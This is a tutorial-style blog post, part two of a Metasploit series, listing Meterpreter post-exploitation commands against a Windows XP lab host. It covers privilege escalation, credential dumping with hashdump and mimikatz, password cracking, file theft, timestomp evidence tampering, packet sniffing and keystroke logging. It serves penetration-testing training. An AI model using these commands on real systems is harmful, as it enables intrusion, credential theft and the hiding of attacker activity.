MSF Fundamentals 2017 (Part 2 of 3) – Exploitation and Post-Exploitation

This is quick-hit version of part two of a three part series on Metasploit Fundamentals that I wrote to update my previous work (from 2014) on Metasploit. If you’re looking for a more hands-on/in-depth version of this article you can access training on this topic here.

The purpose of this article is to cover exploitation and post-exploitation modules to the point where you are comfortable with the various ways of manipulating a system after you’ve opened a session to it. Part one covered starting up the MSF, finding an exploit, finding a matching payload, and configuring everything up to the point of launching the exploit. Part three covers pivoting, port forwarding, and automation. This training assumes you’re using a 2016 variant of Kali Linux and that it’s patched up to at least August 2016. If that’s true, then let’s go!

Notes

  1. This article assumes that you are already familiar with the contents of part one.  If you aren’t, go back and read that now.
  2. For the purposes of this article we will assume that the vulnerable system is on 10.20.30.100, and that the machine running MSF is on 10.20.30.200.  We’ll furthermore assume that the target is a Windows XP machine that you have already exploited the system using MS08-067, as detailed in part one, and have a running Meterpreter session.
  3. As these are quick hit notes I haven’t included screenshots/outputs. They’re intended for you to follow along with and modify as appropriate for your environment.  If you want to quickly establish a test environment that will support all of these tests you can do so by installing a Windows XP SP1 VM with two accounts, then log into one of the accounts, log back out, and leave the machine running.
  4. I’m using the terminology “MSF> ” to refer to things that take place from an MSF console perspective, and “MTR> ” to refer to things that take place from a Meterpreter session

Managing Sessions

MSF> sessions --list                                # Show all sessions, from MSF
MSF> sessions -i {session_number}                   # Resume interactive session with (session number)
MSF> sessions -C {command} -i {session_number}      # Execute (command) on session (session_number)
MSF> sessions -C {command}                          # Execute (command) on all sessions
MTR> background                                     # Return to MSF interaction
MTR> sessions {session_number}                      # Switch to interactive session with (session_number)

Migrating Host Processes

MTR> ps                                             # Show all processes, look for privileged PID
MTR> migrate {PID}                                   # Migrate MTR to PID as host process

Using Meterpreter Extensions

MTR> help                                            # Show help, look for {name}: to ID extensions
MTR> help {command}                                  # WRONG... Works in MSF, not MTR
MTR> {command} -h                                    # Get help for {command}
MTR> load [tab twice]                                # Show available extensions to load
MTR> load {extension}                                # Load {extension}, downloads from MSF

Privilege Escalation

MTR> getsystem                                       # Attempt to auto escalate privileges

Alternatively, you can use more specific exploits if the generic “getsystem” approach doesn’t work by backgrounding the session, choosing the appropriate exploit (e.g. exploit/windows/local/ms10_092_schelevator) and setting the value of “SESSION” to the session ID that you want to use.

Credential Dumping

MTR> hashdump                                        # Dump all accessible credential hashes
MTR> load mimikatz                                   # Load the mimikatz extension
MTR> kerberos                                        # Dump kerberos creds from mimikatz
MTR> livessp                                         # Dump live SSP creds from mimikatz
MSF> creds add password:'{password}'                 # Add {password} to known creds
MSF> creds add user:{user} password:'{password}'     # Add {user} with {password} to known creds
MSF> creds add user:{user} ntlm:{hash} realm:{dom}   # Add {user} with {hash} in {domain} to known creds
MSF> creds add user:{user} ssh-key:{keyfile}         # Add {user} with {ssh-key} to known creds

Just as with the general extensions comment, you can also use a post-exploitation module from MSF itself (e.g. post/windows/gather/hashdump) by setting the value of “SESSION” to the session ID that you want to use. When using a module from MSF that captures credentials they are automatically added to the creds store as well.

Cracking Passwords

MSF> use auxiliary/analyze/jtr_crack_fast            # Try quick John the Ripper password cracks

Uploading

MTR> upload {local_file} {remote_directory}          # Upload {local_file} to {remote_directory}
MTR> upload -r {local_directory} {remote_directory}   # Recursive upload {local_directory} to {remote_directory}

The {local_file} can be one or more files, just like with a standard *nix system, so if it’s one or 50 entries, it doesn’t matter. The last entry will be the remote directory. Similarly, you can mix and match directories and files in the recursive upload. A recursive upload of a file just uploads the file.

Downloading

MTR> download {remote_file} {local_directory}        # Download {remote_file} to {local_directory}
MTR> download -t {remote_file} {local_directory}      # Download {remote_file} to {local_directory} and timestamp it
MTR> download -r {remote_directory} {local_directory} # Recursive download {remote_directory} to {local_directory}

The {remote_file} can be one or more files, just like with a standard *nix system, so if it’s one or 50 entries, it doesn’t matter. The last entry will be the local directory. Similarly, you can mix and match directories and files in the recursive download. A recursive download of a file just uploads the file. You can also mix and match the timestamping option (-t) with the recursive option (-r).

Searching

MTR> search -f {pattern}                             # Recursive search from root of filesystem for {pattern}
MTR> search -d {directory} -f {pattern}               # Recursive search from {directory} for {pattern}
MTR> search -d C:\\WINDOWS\ -f *.dll                  # Find all DLLs in the Windows directory and subdirectories

Hiding Data

MTR> timestomp C:\\ -b -r                            # Wipe all MACE attributes on the C:\ drive
MTR> timestomp evil.exe -f c:\\WINDOWS\notepad.exe    # Set evil.exe to match MACE attributes of notepad.exe
MTR> timestomp upld.dll -c "10/14/2010 11:12:13"      # Set created time of upld.dll to 11:12:13 on 10/14/2010.

Packet Captures

MTR> load sniffer                                    # Load the sniffer extension (pre-req to pcap)
MTR> sniffer_interaces                                # List interfaces, note interface number
MTR> sniffer_start {interface} {number_packets}       # Start packet capture on {interface}, max {number_packets}
MTR> sniffer_stop {interface}                         # Stop packet capture on {interface}
MTR> sniffer_dump {interface} {file}                  # Write packets captured from {interface} to local {file}

Keystroke Captures

MTR> keyscan_start                                   # Begin keystroke capture in host process
MTR> keyscan_dump                                     # List all captured keystrokes
MTR> keyscan_stop                                     # Stop keystroke capture

It’s important to remember that this capture is specific to the process you are attached to, not a global system keylogger. If you aren’t attached to what you want to monitor for this purpose then migrate to that process.

That’s all for part two… good hunting!